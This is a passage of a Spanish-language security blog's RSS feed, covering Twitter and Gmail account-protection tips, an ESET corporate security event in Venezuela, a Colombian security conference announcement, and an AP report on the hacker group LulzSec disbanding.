<li>Usa HTTPS para más seguridad en Twitter. Esta es la misma tecnología de cifrado que te permite hacer pagos seguros en línea. Aprende cómo hacerlo <a href="http://blog.es.twitter.com/2011/03/twitter-mas-seguro-https.html">aquí.</a></li>
<li>Te recomendamos vincular tu teléfono con tu cuenta de Twitter. Hacer esto puede salvar tu cuenta si pierdes control de tu correo personal y o tu contraseña. Este artículo te explica <a href="https://support.twitter.com/articles/365327-como-activar-tu-telefono-desde-la-pagina-web-de-twitter">cómo hacerlo.</a></li>
<li>Si piensas que tu cuenta ha sido comprometida, visita nuestra <a href="https://support.twitter.com/articles/371582-mi-cuenta-ha-sido-comprometida">página de ayuda para cuentas comprometidas </a>para saber cómo proceder.</li>
</ul>
<p>Estamos comprometidos por mantener a Twitter como una comunidad abierta y segura, y educar a nuestros usuarios es una de las mejores formas de mantener las cuentas seguras. A menudo enviamos actualizaciones de seguridad vía <a href="https://twitter.com/#!/ayuda">@ayuda</a> y<a href="https://twitter.com/#!/safety">@safety</a> (en Inglés), y regularmente actualizamos nuestras <a href="https://support.twitter.com/articles/349068-manteniendo-la-seguridad-de-tu-cuenta">páginas de ayuda sobre seguridad de las cuentas</a>. Para individuos y organizaciones usando Twitter en capacidad oficial, <a href="http://media.twitter.com/newsrooms">Twitter para Salas de Redacción</a> ha sido actualizado con una excelente lista de seguridad, localizada <a href="http://media.twitter.com/newsrooms/security">aquí</a>.</p>
<p>fuente:<br />
<a href="http://blog.es.twitter.com/2011/07/manteniendo-la-seguridad-de-tu-cuenta.html">http://blog.es.twitter.com/2011/07/manteniendo-la-seguridad-de-tu-cuenta.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/como-puedo-mantener-mi-cuenta-de-twitter-segura-y-privada/2012/04/30/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Seguridad en tu Gmail: ¿Qué es la verificación en dos pasos?</title>
		<link>http://www.enfoqueseguro.com/seguridad-en-tu-gmail-que-es-la-verificacion-en-dos-pasos/2012/04/30/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/seguridad-en-tu-gmail-que-es-la-verificacion-en-dos-pasos/2012/04/30/#comments</comments>
		<pubDate>Mon, 30 Apr 2012 10:09:09 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[Correo E]]></category>
		<category><![CDATA[E-Mail]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Mòvil]]></category>
		<category><![CDATA[Privacidad]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Seguridad Extra]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=4292</guid>
		<description><![CDATA[Cómo funciona  La verificación en dos pasos aporta una capa extra de seguridad a tu cuenta de Google. Además de tu nombre de usuario y de tu contraseña, deberás introducir un código que Google te enviará a través de un mensaje de texto o de voz una vez que hayas iniciado sesión. Motivos por los [...]]]></description>
				<content:encoded><![CDATA[<div>
<h2>Cómo funciona</h2>
<div> La verificación en dos pasos aporta una capa extra de seguridad a tu cuenta de Google.</div>
</div>
<div id="article-content-div">
<p>Además de tu nombre de usuario y de tu contraseña, deberás introducir un código que Google te enviará a través de un mensaje de texto o de voz una vez que hayas iniciado sesión.</p>
<p><a href="http://www.enfoqueseguro.com/seguridad-en-tu-gmail-que-es-la-verificacion-en-dos-pasos/2012/04/30/"><em>Pinche aquí para ver el vídeo</em></a></p>
<h4 id="second_header">Motivos por los que debes utilizar la verificación en dos pasos</h4>
<p>La verificación en dos pasos reduce drásticamente las posibilidades de que otra persona robe la información personal de tu cuenta de Google. ¿Por qué? Porque los piratas informáticos no solo tendrían que obtener tu contraseña y tu nombre de usuario, sino que también tendrían que robar tu teléfono.
</p></div>
<div> <a href="http://support.google.com/accounts/bin/answer.py?hl=es&amp;answer=180744">http://support.google.com/accounts/bin/answer.py?hl=es&amp;answer=180744</a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/seguridad-en-tu-gmail-que-es-la-verificacion-en-dos-pasos/2012/04/30/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ESET: Empresas asistieron al llamado de la Seguridad Informática</title>
		<link>http://www.enfoqueseguro.com/eset-empresas-asistieron-al-llamado-de-la-seguridad-informatica/2012/04/29/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/eset-empresas-asistieron-al-llamado-de-la-seguridad-informatica/2012/04/29/#comments</comments>
		<pubDate>Sun, 29 Apr 2012 18:43:31 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Corporativo]]></category>
		<category><![CDATA[Educación]]></category>
		<category><![CDATA[Eventos]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=4262</guid>
		<description><![CDATA[La compañía global de software antivirus ESET realizó la segunda edición del ESET Security Day, con el objetivo de presentar al sector empresarial las tendencias del cibercrimen y las últimas soluciones disponibles en materia de seguridad antimalware &#160; Un sinnúmero de métodos son ingeniados diariamente por la industria del software dañino para robar información confidencial, [...]]]></description>
				<content:encoded><![CDATA[<p align="center"><em><img class="size-full wp-image-3348 alignleft" style="margin-left: 10px; margin-right: 10px;" title="ESET" src="http://www.enfoqueseguro.com/wp-content/uploads/2011/10/ESET.png" alt="ESET" width="200" height="78" />La compañía global de software antivirus ESET realizó la segunda edición del ESET Security Day, con el objetivo de presentar al sector empresarial las tendencias del cibercrimen y las últimas soluciones disponibles en materia de seguridad antimalware</em></p>
<p>&nbsp;</p>
<p>Un sinnúmero de métodos son ingeniados diariamente por la industria del software dañino para robar información confidencial, con el objetivo de conseguir beneficios generalmente económicos; un delito que consigue su blanco perfecto en grandes empresas. Consciente de esta realidad las principales corporaciones de Venezuela acudieron el pasado jueves al ESET Security Day, un evento interactivo y de capacitación contra la inseguridad informática, realizado en su segunda edición por la compañía global de soluciones antivirus, ESET.<span id="more-4262"></span></p>
<p><a href="http://www.enfoqueseguro.com/eset-empresas-asistieron-al-llamado-de-la-seguridad-informatica/2012/04/29/eset2nd-img_5112/#utm_source=feed&amp;utm_medium=feed&amp;utm_campaign=feed" rel="attachment wp-att-4263"><img class="alignright" title="ESET2nd-IMG_5112" src="http://www.enfoqueseguro.com/wp-content/uploads/2012/04/ESET2nd-IMG_5112-300x190.jpg" alt="" width="300" height="190" /></a></p>
<p>La actividad se realizó en el Hotel Caracas Palace, con la participación de representantes de ESET Latinoamérica: Raphael Labaca Castro, Especialista de Awareness &amp; Research de ESET Latinoamérica, quien dedicó su disertación a explicar la forma correcta de gestionar la información en empresas, y Maximiliano Cantis, Channel Manager para el norte de América del Sur y Centroamérica de ESET Latinoamérica, encargado de profundizar el tema de las soluciones de ESET.</p>
<p>&nbsp;</p>
<p>Renato de Gouveia, Gerente de Mercadeo y Ventas para ESET Venezuela, informó que este año la actividad se enfocó en la protección de la información y el uso de las herramientas actuales para combatir el cibercrimen. “La charla fue dirigida a los gerentes y expertos en seguridad de corporaciones del sector público y privado, con el fin de educar y aclarar las inquietudes acerca de las últimas tendencias de malware que pueden afectar a las empresas”.</p>
<p>&nbsp;</p>
<p>“Con el objetivo de lograr un mejor intercambio de opiniones y  participación más activa de nuestros invitados, se incorporó una mesa redonda interdisciplinaria conformada por reconocidos expertos en seguridad informática”, mencionó de Gouveia, quien además acotó  que el ESET Security Day se realizó este año con éxito en países latinoamericanos como Perú, Ecuador y México.</p>
<p>&nbsp;</p>
<p><strong>Educación antimalware al alcance de todos</strong></p>
<p><strong></strong><a href="http://www.enfoqueseguro.com/eset-empresas-asistieron-al-llamado-de-la-seguridad-informatica/2012/04/29/eset2nd-img_5188/#utm_source=feed&amp;utm_medium=feed&amp;utm_campaign=feed" rel="attachment wp-att-4264"><img class="size-medium wp-image-4264 alignleft" style="margin-left: 10px; margin-right: 10px;" title="ESET2nd-IMG_5188" src="http://www.enfoqueseguro.com/wp-content/uploads/2012/04/ESET2nd-IMG_5188-300x225.jpg" alt="" width="300" height="225" /></a></p>
<p>Las técnicas de persuasión avanzan cada minuto y hacen que cualquier usuario sea vulnerable si no posee la educación adecuada; de esta forma la prevención no solo es cuestión de empresas, por lo que ESET, reforzó la actividad, realizando la cuarta edición de su conocida Gira Antivirus que se realizó este año en las principales universidades del Edo. Lara. Este año, los seminarios gratuitos se dirigieron a todos los estudiantes universitarios -de cualquier carrera- de las principales universidades del Edo. Lara; en esta oportunidad se contó con la vocería de Raphael Labaca Castro,  Especialista de Awareness &amp; Research de ESET Latinoamérica.<br />
<strong>Acerca de ESET</strong></p>
<p>&nbsp;</p>
<p><a href="http://www.enfoqueseguro.com/eset-empresas-asistieron-al-llamado-de-la-seguridad-informatica/2012/04/29/eset2nd-img_5101/#utm_source=feed&amp;utm_medium=feed&amp;utm_campaign=feed" rel="attachment wp-att-4265"><img class="size-medium wp-image-4265 alignright" title="ESET2nd-IMG_5101" src="http://www.enfoqueseguro.com/wp-content/uploads/2012/04/ESET2nd-IMG_5101-300x225.jpg" alt="" width="300" height="225" /></a>Fundada en 1992, ESET es una compañía global de soluciones de software de seguridad que provee protección de última generación contra amenazas informáticas. La empresa cuenta con oficinas centrales en Bratislava, Eslovaquia, de Coordinación Global en San Diego, California y también sedes en Londres (Reino Unido), Praga (República Checa), Cracovia (Polonia) y Buenos Aires (Argentina).</p>
<p>Además de su producto estrella ESET NOD32 Antivirus, desde el 2007 la compañía ofrece ESET Smart Security, la solución unificada que integra la multipremiada protección proactiva del primero con un firewall y anti-spam. Las soluciones de ESET ofrecen a los clientes corporativos el mayor retorno de la inversión (ROI) de la industria como resultado de una alta tasa de productividad, velocidad de exploración y un uso mínimo de los recursos.</p>
<p>El trabajo de ESET con grandes corporaciones como Canon, Dell, Bridgestone y Microsoft le ha permitido entrar en el Deloitte Technology Fast 500, región Europa, Medio Oriente y África, por cinco años consecutivos.</p>
<p>ESET cuenta también con un largo historial de reconocimientos por parte de prestigiosos laboratorios de la industria: su solución ESET NOD32 logra más premios de Virus Bulletin que ningún otro producto antivirus disponible, detectando consistentemente todos las muestras activas (<em>In-the-Wild</em>) sin generar falsos positivos.</p>
<p>Desde el 2004, ESET opera para la región de América Latina en Buenos Aires, Argentina, donde dispone de un equipo de profesionales capacitados para responder a las demandas del mercado en forma concisa e inmediata y un laboratorio de investigación focalizado en el descubrimiento proactivo de variadas amenazas informáticas.</p>
<p>La importancia de complementar la protección brindada por tecnología líder en detección proactiva de amenazas con una navegación y uso responsable del equipo, junto con el interés de fomentar la concientización de los usuarios en materia de seguridad informática, convierten a las campañas educativas en el pilar de la identidad corporativa de ESET, cuya Gira Antivirus ya ha adquirido renombre propio.</p>
<p>&nbsp;</p>
<p>Para más información, visite <a href="http://www.eset-la.com/">http://www.eset-la.com</a></p>
<p><strong> </strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/eset-empresas-asistieron-al-llamado-de-la-seguridad-informatica/2012/04/29/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Este lunes 28 SECURITY-ZONE, un evento de seguridad informática de talla Internacional</title>
		<link>http://www.enfoqueseguro.com/este-lunes-28-security-zone-un-evento-de-seguridad-informatica-de-talla-internacional/2011/11/26/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/este-lunes-28-security-zone-un-evento-de-seguridad-informatica-de-talla-internacional/2011/11/26/#comments</comments>
		<pubDate>Sat, 26 Nov 2011 15:15:26 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Ciberguerra]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[Corporativo]]></category>
		<category><![CDATA[Eventos]]></category>
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=3540</guid>
		<description><![CDATA[The Muro Group International presenta SECURITY-ZONE 2011, un evento de seguridad informática de talla internacional presentado en Centro de Eventos Valle del Pacifico en Cali, Colombia, Noviembre 28 al 30, 2011. SECURITY-ZONE 2011 reúne a 16 reconocidos expertos de seguridad informática provenientes de USA, Europa, Asia, y Colombia, en un ambiente propicio para el intercambio [...]]]></description>
				<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.securityzone.co/"><img class="aligncenter" title="SECURITY-ZONE" src="http://securityzone.co/images/title1.gif" alt="SECURITY-ZONE, un evento de seguridad informática de talla internacional presentado en Centro de Eventos Valle del Pacifico en Cali, Colombia, Noviembre 28 al 30, 2011." width="484" height="176" /></a></p>
<p>The Muro Group International presenta SECURITY-ZONE 2011, un evento de seguridad informática de talla internacional presentado en Centro de Eventos Valle del Pacifico en Cali, Colombia, Noviembre 28 al 30, 2011.</p>
<p>SECURITY-ZONE 2011 reúne a 16 reconocidos expertos de seguridad informática provenientes de USA, Europa, Asia, y Colombia, en un ambiente propicio para el intercambio de conocimiento, actualización de información, y networking.</p>
<p>SECURITY-ZONE 2011 ofrece traducción simultanea.</p>
<p>SECURITY-ZONE 2011 le da la oportunidad a profesionales en seguridad informática interactuar con reconocidos expertos de la industria y escuchar acerca de los nuevos avances en seguridad informática, nuevas metodologías siendo utilizadas por hackers sofisticados, nuevas tendencias de ataques, y otros temas relacionados con seguridad informática.</p>
<p>Los expertos conferencistas de SECURITY-ZONE 2011 compartirán su experiencia y conocimiento en:</p>
<ul>
<li>Adopción de nuevas tecnologías y soluciones de seguridad informática dentro del ambiente corporativo.</li>
<li>Soluciones para mitigar riesgos potenciales.</li>
<li>Temas importantes de seguridad informática que afecta el sector financiero, salud, militar, Educación, y telecomunicaciones.<span id="more-3540"></span></li>
</ul>
<p>&nbsp;</p>
<p>SECURITY-ZONE 2011 tiene una duración de tres (3) días, programado de la siguiente manera:</p>
<ul>
<li>Días uno y dos, Workshops presentados por los expertos invitados.</li>
<li>Día 3 presentaremos entrenamiento técnico divido en tres niveles: Básico, Intermedio, y Experto.</li>
</ul>
<p>Este evento va dirigido a:</p>
<ul>
<li>Chief Information Officer (CIO)</li>
<li>Chief Information Security Officer (CISO)</li>
<li>Chief Security Officer (CSO)</li>
<li>Chief Technology Officer (CTO)</li>
<li>Chief Operation Officer (COO)</li>
<li>Vice-President / Director of Operations</li>
<li>Director of Security</li>
<li>IT/MIS Director / Manager</li>
<li>Network Administrator / Engineer</li>
<li>Security Product Manager</li>
<li>Security Project Manager</li>
<li>Security R&amp;D Manager</li>
<li>Systems Analyst / Auditor / Consultant</li>
<li>Aquellos responsables por seguridad corporativa</li>
<li>Aquellos encargados de investigaciones de violación de normas de seguridad y cuestiones disciplinarias y legales asociados con estos actos ilegales.</li>
<li>Aquellos interesados en desarrollar su carrera profesional en seguridad informática.</li>
</ul>
<p>&nbsp;</p>
<div> <span class="Apple-style-span" style="font-size: 20px; font-weight: bold;">Centro de Eventos Valle del Pacifico</span></div>
<div></div>
<p>El Centro de Eventos Valle del Pacífico es el más reciente y moderno del país. Cuenta con un área total construida de 40.000 metros cuadrados y tiene capacidad para albergar entre 50 hasta 11.000 personas en un solo lugar.</p>
<p>Su diseño multifuncional permite adecuarlo para la realización de congresos, conferencias, reuniones sociales, desfiles, obras de teatro, conciertos y exposiciones y también para la práctica de siete deportes olímpicos.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><a href="http://www.securityzone.co/">http://www.securityzone.co</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/este-lunes-28-security-zone-un-evento-de-seguridad-informatica-de-talla-internacional/2011/11/26/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>LulzSec anuncia su disolución: ¿Miedo o Aburrimiento?</title>
		<link>http://www.enfoqueseguro.com/lulzsec-anuncia-su-disolucion-%c2%bfmiedo-o-aburrimiento/2011/06/27/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/lulzsec-anuncia-su-disolucion-%c2%bfmiedo-o-aburrimiento/2011/06/27/#comments</comments>
		<pubDate>Mon, 27 Jun 2011 04:39:44 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Ciberguerra]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[disolución]]></category>
		<category><![CDATA[lulz security]]></category>
		<category><![CDATA[lulzsec]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=2696</guid>
		<description><![CDATA[Un grupo de piratas cibernéticos en busca de fama que dejó una estela de sabotajes en contra de varios sitios de internet en los últimos dos meses que incluyó ataques contra autoridades y publicación de información privada, anunció inesperadamente su disolución.Lulz Security dio a conocer su decisión el sábado a través de su cuenta de [...]]]></description>
				<content:encoded><![CDATA[<div id="SearchKey_Text1"><img class="alignleft" style="margin-left: 10px; margin-right: 10px;" title="LulzSec " src="http://upload.wikimedia.org/wikipedia/en/3/37/Lulz_Security.jpg" alt="" width="242" height="225" />Un grupo de piratas cibernéticos en busca de fama que dejó una estela de sabotajes en contra de varios sitios de internet en los últimos dos meses que incluyó ataques contra autoridades y publicación de información privada, anunció inesperadamente su disolución.Lulz Security dio a conocer su decisión el sábado a través de su cuenta de Twitter sin ofrecer motivos sobre su separación pero podría ser una señal de nerviosismo ante las investigaciones que realizan las autoridades.</p>
<p>Piratas cibernéticos rivales también se unieron a la cacería al proporcionar información que, de acuerdo a ellos, podría revelar las identidades de los seis integrantes del grupo.</p>
<p>Uno de los miembros del grupo fue entrevistado por The Associated Press y no dio indicios de que su labor estuviera llegando a su fin. LulzSec se adjudicó ataques en contra de empresas importantes de la industria del entretenimiento, de la Agencia Central de Inteligencia (CIA, por sus siglas en inglés), <span id="more-2696"></span>de organizaciones asociadas con el FBI, del Senado estadounidense y un sitio de material pornográfico.</p>
<p>Kevin Mitnick, consultor en seguridad y ex ciberpirata, dijo que probablemente el grupo determinó que entre más acciones realizara mayor era la posibilidad de que alguno de ellos cometiera un error que permitiría a las autoridades dar con ellos.</p>
<p>El grupo fue inspiración de otros que los imitaron en todo el mundo, destacó el especialista, lo que abre la posibilidad de que ataques similares continúen aún sin LulzSec.</p>
<p>&#8220;Ellos pueden sentarse tranquilamente a ver el caos y no arriesgarse a ser capturados&#8221;, agregó Mitnick.</p>
<p>A manera de despedida, LulzSec reveló documentos e información de cuentas de acceso aparentemente obtenidas de páginas de juegos por internet y de servidores corporativos.</p>
<p>El más grande grupo de documentos —338 archivos— parece incluir información de AT&amp;T que detalla la creación de una nueva red de banda ancha inalámbrica en Estados Unidos. La red está lista para entrar en funciones este verano. Un vocero de la empresa telefónica no pudo confirmar la autenticidad de los documentos.</p>
</div>
<div>
<div><a href="http://noticias.terra.com.pe/internacional/eeuu/">más noticias de ee.uu. »</a></div>
</div>
<dl>
<dd>AP &#8211; The Associated Press. Todos los derechos reservados.</dd>
</dl>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/lulzsec-anuncia-su-disolucion-%c2%bfmiedo-o-aburrimiento/2011/06/27/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk
Page Caching using disk: enhanced
Database Caching using disk
Object Caching 1299/1399 objects using disk
Content Delivery Network via N/A

 Served from: www.enfoqueseguro.com @ 2013-06-18 20:39:40 by W3 Total Cache -->